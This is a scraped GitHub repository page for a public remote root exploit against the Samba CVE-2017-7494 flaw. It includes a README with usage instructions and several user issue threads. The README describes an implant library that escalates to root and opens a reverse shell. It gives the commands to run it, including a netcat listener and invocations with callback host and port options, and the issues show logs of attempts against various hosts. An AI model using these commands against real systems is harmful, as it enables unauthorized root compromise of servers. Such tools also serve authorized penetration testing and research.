joxeankoret / cve-2017-7494 Goto Github PK

View Code? Open in Web Editor NEW

256.0 14.0 80.0 1002 KB

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

License: GNU General Public License v3.0

Makefile 0.01% C 0.07% Python 99.88% Batchfile 0.01% Shell 0.04%

cve-2017-7494's Introduction

CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability.

Details

This exploit is divided in 2 parts:

First, it compiles a payload called "implant.c" and generates a library (libimplantx32.so or libimplantx64.so) that changes to the root user, detaches from the parent process and spawns a reverse shell.
Second, it finds a writeable share in the specified target host, uploads the library with a random name and tries to load it.

As long as the target is vulnerable and the payload is the correct for the target operating system and architecture, the exploit is 100% reliable.

How to

In your machine, run the following command:

$ nc -p 31337 -l

Then, run the exploit against your target and wait until it connects back to your Netcat:

$ python cve_2017_7494.py -t target_ip

If you close too fast the reverse shell, instead of running again the exploit uploading the module, etc... you can just pass the path to the module it already uploaded. Supposing it was uploaded to /shared/directory/ as "module.so", you would run a command like the following one:

$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

UPDATE 11/25/2017 - Archivaldo

You can now run the exploit again samba 3.5.0 and 3.6.0, you just need add the argument -o 1

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1

You can now use your own custom .so

python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

In case you need to run this script from a x86 machine, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy libimplantx64.so from another machine.

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

In case samba runs just on port 139. You can set the remote server port using the argument -p

python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTES

I do not support it anymore.

-- Joxean Koret

cve-2017-7494's People

Contributors

Stargazers

Watchers

Forkers

johnjohnsp1 infernalheaven wflk rainism cys3c hoangcuongflp maurice-schuppe zhuyue1314 tmcmil awesome-security cs24 hohjgdhsj ognz iamtutu irpr0 houcy thenukebr adastmins peterpt youngforest bmoar pentestingtools cjjduck megamindat totoroha voraka heikipikker ch4p34un0ir pombredanne mehrdad-shokri surlybot hybridious tuian chouaibhm droberson tsondt amorb c002 dlat scopion 100talsec zulou alenazi90 kaxbx bxlcity 8l4nk pentestbr blocky2019 iw00tr00t ashr kkilloas jibanli leandroald7 5l1v3r1 n0pz weeeelye caleb20000 diegoalbuquerque borari br3ach3r-fff fdlucifer nosorry cxzero roxas-tan ch4ng3thew0rld 0xm4ud mohinparamasivam reposities z3ro110 chengcheng227 yeti-coder iamanubhavsaini jackbro jeongzero8732 elijahahianyo zha0 3tternp khugank

cve-2017-7494's Issues

how does this determine the full path?

I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test and this exploit is trying to use the full path /usr/local/samba/tmp/. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.

Thank you!

root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129
[Sun Dec 16 10:21:39 2018] Building libraries...
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
[Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445
[Sun Dec 16 10:21:40 2018] Using a GUEST session
[Sun Dec 16 10:21:40 2018] Using libimplantx64.so
[Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']'
[Sun Dec 16 10:21:41 2018] Done!
[Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Failed to locate the module

Hello,

I was trying to run the exploit, but always got the same message: it seems like the xploit don't find the module on the target.

Any help to get this work? I tried to upload the module using smbclient, but still got the same message.

PS. if the no-compile options is 0, I got several library errors for 32bits.

python cve_2017_7494.py -t 172.16.1.107 -p 445 --rhost=172.20.1.162 --rport=443 -m //libimplantx64.so --no-compile=1
[Wed Sep 5 10:53:05 2018] I will keep the current binaries. No need for new compilation.
[Wed Sep 5 10:53:05 2018] Logging into the Samba server 172.16.1.107:445
[Wed Sep 5 10:53:06 2018] Using a GUEST session
[Wed Sep 5 10:53:06 2018] Trying to load module //libimplantx64.so
[Wed Sep 5 10:53:07 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

add custom share name

req for an argument to put a custom share name

Error: The NETBIOS connection with the remote host timed out

HI i gotten this error while executing your script, any idea how to resolve

SMB SessionError

Need help on this
[Mon Nov 23 23:34:38 2020] I will keep the current binaries. No need for new compilation.
[Mon Nov 23 23:34:38 2020] Logging into the Samba server 10.0.2.18:445
[Mon Nov 23 23:34:38 2020] Using a GUEST session
[Mon Nov 23 23:34:38 2020] Using libimplantx64.so
[Mon Nov 23 23:34:38 2020] Trying to copy library 'JJAnPsko.so' to share '[u'print$', u'/var/lib/samba/printers']'
[Mon Nov 23 23:34:38 2020] Done!
[Mon Nov 23 23:34:38 2020] Trying to copy random library JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Trying to load module /var/lib/samba/printers/JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

No module named Util.number

I've cloned the master branch, I've installed the requirements via a venv, and I get this error when running the exploit.

python2 cve_2017_7494.py -t 192.168.1.84 
Traceback (most recent call last):
  File "cve_2017_7494.py", line 20, in <module>
    from impacket.dcerpc.v5 import transport, srvs
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/dcerpc/v5/transport.py", line 18, in <module>
    from impacket.smbconnection import smb, SMBConnection
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smbconnection.py", line 20, in <module>
    from impacket import smb, smb3, nmb, nt_errors, LOG
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smb.py", line 53, in <module>
    from impacket.krb5.gssapi import KRB5_AP_REQ
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/gssapi.py", line 17, in <module>
    from Crypto.Hash import HMAC, MD5
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/Crypto.py", line 48, in <module>
    from Crypto.Util.number import GCD as gcd
ImportError: No module named Util.number

I've installed both packages :

# pip install pycrypto
# pip show pycrypto
Name: pycrypto
Version: 2.6.1
Summary: Cryptographic modules for Python.
Home-page: http://www.pycrypto.org/
Author: Dwayne C. Litzenberger
Author-email: [email protected]
License: UNKNOWN
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by: 
# pip install pycryptodome
# pip show pycryptodome
Name: pycryptodome
Version: 3.10.1
Summary: Cryptographic library for Python
Home-page: https://www.pycryptodome.org
Author: Helder Eijs
Author-email: [email protected]
License: BSD, Public Domain
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by:

What have I done wrong ? Any ideas ? Thanks :)

Cannot resolve local IP address.

Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

Error in test

Dear Joxean,

I'm testing one of my vulnerability machine with samba smbd 4.3.8-Ubuntu, and found your code.
I tried to reproduce the exploit but this is the error which i got:

python cve_2017_7494.py -t 192.168.1.220
Traceback (most recent call last):
File "cve_2017_7494.py", line 212, in
main()
File "cve_2017_7494.py", line 206, in main
if exploit.exploit():
File "cve_2017_7494.py", line 161, in exploit
if not self.make_library():
File "cve_2017_7494.py", line 89, in make_library
raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

Can you tell me where i did wrong? do i need to change the IP address in config file?

Thank you so much for your help.

How to use it?

Hi, I'm very curious about how to use it.
Can you add a tutorial to use it?

Thanks. Great job.

Error while executing the script

Ubuntu 18.04 running error

gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
In file included from implant.c:16:0:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
 #include <bits/libc-header-start.h>
          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
Makefile:10: recipe for target 'libimplantx32.so' failed
make: *** [libimplantx32.so] Error 1

IOError: [Errno 2] No such file or directory: 'libimplantx64.so'

trying to use the exploit on 139 port:
python cve_2017_7494.py -t -p 139 --rhost --rport 31337 -n 1

and i got this output:

[..] I will keep the current binaries. No need for new compilation.
[..] Logging into the Samba server ip:port
[..] Using a GUEST session
[..] Using libimplantx64.so
[..] Trying to copy library 'n5R8qbmA.so' to share '[u'docs', u'/usr/share/doc']'
Traceback (most recent call last):
File "cve_2017_7494.py", line 254, in
main()
File "cve_2017_7494.py", line 248, in main
if exploit.exploit():
File "cve_2017_7494.py", line 196, in exploit
server_directory = self.try_copy_library(lib_name)
File "cve_2017_7494.py", line 165, in try_copy_library
if self.try_put(share, lib_name, real_file):
File "cve_2017_7494.py", line 117, in try_put
with open(real_file, "rb") as f:
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'